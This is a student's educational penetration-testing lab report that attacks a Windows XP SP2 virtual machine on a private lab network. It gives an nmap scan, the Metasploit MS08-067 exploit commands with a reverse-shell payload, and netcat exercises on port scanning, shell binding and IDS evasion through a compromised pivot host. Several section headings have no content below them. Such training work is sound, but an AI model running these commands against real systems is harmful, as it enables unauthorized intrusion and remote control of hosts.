File

advertisement
ODIN Securities
This Report Was Prepared By:
ODINSEC CEO:
Phillip Rose
phirose@uat.edu
The information contained within this report is considered
educational and for learning purposes only. Inappropriate and
unauthorized disclosure of this report or portions of it could
result in significant damage or negative legal issues. This
report should be distributed to individuals on a Need-to-Know
basis only. Again this document and all cases are hypothetical
and for educational and training purposes only.
Executive Summary of Security Report
Introduction to Report
Overview of Report
Operating System Identification
Kali Linux Current version as of 10/16/2013
Windows XP SP2
Tools
Metasploit Framework
NetCat
Custom Script
XP SP2 attack
Scanning
Thought process for choosing exploit
Exploit
NETCAT
Grab a banner from a TCP service with Netcat and provide a screenshot.
Use Netcat to show an open port on a system.
Use Netcat to connect to a web server and issue either a HEAD or a GET request
Use Netcat to listen verbosely on a port.
Vulnerable Image attacks
Scanning
Thought Process for choosing exploit
Exploit
XP SP2 attack
Scanning
nmap -sS -A 192.168.159.141
Starting Nmap 6.01 ( http://nmap.org ) at 2013-11-13 17:49 EST
Nmap scan report for 192.168.159.141
Host is up (0.00026s latency).
Not shown: 997 closed ports
PORT
STATE SERVICE
135/tcp open msrpc
VERSION
Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:16:8A:C4 (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: AKELLY-D3D808A1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:16:8a:c4
(VMware)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Computer name: akelly-d3d808a1
| NetBIOS computer name: AKELLY-D3D808A1
| Workgroup: WORKGROUP
|_ System time: 2013-11-13 17:50:05 UTC-7
Service Enumeration
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Thought process for choosing exploit
Since port 445 is open, experience shows that this computer is most likely running SMB over
this port. (Default XP configuration) Based on this, I am going to select an exploit relevant to
SMB for windows XP. After searching through msf, ms08_067_netapi is chosen as it is a known,
reliable exploit for the OS.
search smb
use exploit/windows/smb/ms08_067_netapi
Setting options for the attack
show options
set RHOST 192.168.159.141
show payloads
set PAYLOAD windows/shell/reverse_tcp_allports
set LHOST 192.168.159.147
exploit –j
NETCAT
1)Grab a banner from a TCP service with Netcat and provide a screenshot.
2)Use Netcat to show an open port on a system.
Echo “” |netcat –v –n –w1 192.168.159.141 18-200
With 1 command, I was able to complete both tasks. This would check each port by sending an empty
string and putting the output to the screen. Unfortunately, my machine did not have any banners to
display.
Use Netcat to connect to a web server and issue either a HEAD or a GET request
Use Netcat to listen verbosely on a port and have the other send a shell.
Bind a shell to a port with Netcat
Create a file called transfer.txt that contains the text “Transfer Me”. Now, set Netcat up to
listen on a port and send this file when the port is connected to.
Connect to the system with the shell bound to the port
You are an attacker. Describe a scenario where you would want to / need to use port
redirection during an attack.
Most likely, I would do this when I am using a beachhead/zombie machine that I took over in
the DMZ to perform scans on my behalf. By using this machine that is compromised early in the
pen-test, I can get around IDS by having that machine do the scanning for me.
Download